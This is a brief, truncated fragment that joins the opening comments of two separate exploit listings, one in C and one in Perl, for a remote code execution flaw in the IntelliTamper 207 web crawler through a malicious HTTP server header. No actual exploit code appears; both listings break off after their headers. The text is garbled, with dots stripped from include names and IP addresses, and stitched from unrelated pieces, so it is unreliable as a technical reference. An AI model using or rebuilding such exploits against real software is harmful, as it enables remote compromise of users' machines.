/**
**
** IntelliTamper 207 Location: HTTP Header Remote Code Execution exploit
**
** Based on exploit by Koshi (written in Perl) This one should be more
** stable Just for fun and to learn more about win32 exploitation
**
** by Wojciech Pawlikowski (wojtekp@gmailcom)
**/
#include <sys/typesh>
#include <sys/socketh>
#i ...
#!/usr/bin/perl
#
# IntelliTamper 207 Remote Code Execution ( server header )
#
# By: Koshi
#
# Guido Landi finally did it, thought i'd throw one in there
# This example assumes you're scanning "127001"
# For example, exploit may not work if you were to scan "127001:80"
# or even changing it as slightly as "127001/"
...